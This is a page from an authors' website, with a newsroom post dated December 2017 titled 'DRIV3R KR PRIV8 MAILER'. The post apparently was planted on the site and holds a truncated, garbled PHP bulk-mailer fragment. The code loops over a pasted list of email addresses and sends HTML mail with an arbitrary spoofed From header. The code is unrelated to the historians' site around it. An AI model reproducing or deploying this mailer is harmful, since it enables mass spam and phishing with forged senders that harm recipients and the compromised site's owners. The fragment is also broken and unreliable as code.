Skip to main content
Main menu
The Authors
Newsroom
Peter and Sheila Forrest
Historians & Writers
Bookstore
More about this book
Have a look inside the pages of our latest release.
Sorry, you need
Flash
to see the preview.
Newsroom Archives
January 2012
(2)
December 2017
(1)
January 2023
(7)
amine
← Back to the Newsroom
amine
Post date:
22 December 2017
DRIV3R KR PRIV8 MAILER
'; $to = $_POST['emails']; $email = explode("\n", $to); $message = stripslashes($message); $i = 0; $count = 1; while($email[$i]) { $ok = "ok"; $headers = "MIME-Version: 1.0\n"; $headers .= "Content-Type: text/html; charset=UTF-8\n"; $headers .= 'From: ' . $from_mail . "\r\n"; if(mail($email[$i], $subject, $message, $headers)) echo "
Number: $count
".$email[$i]."
Rezult inchallah....!
"; else echo "
Number: $count
".$email[$i]."
Error in Sending ??
"; $i++; $count++; } $count--; if($ok == "ok") echo ""; } ?>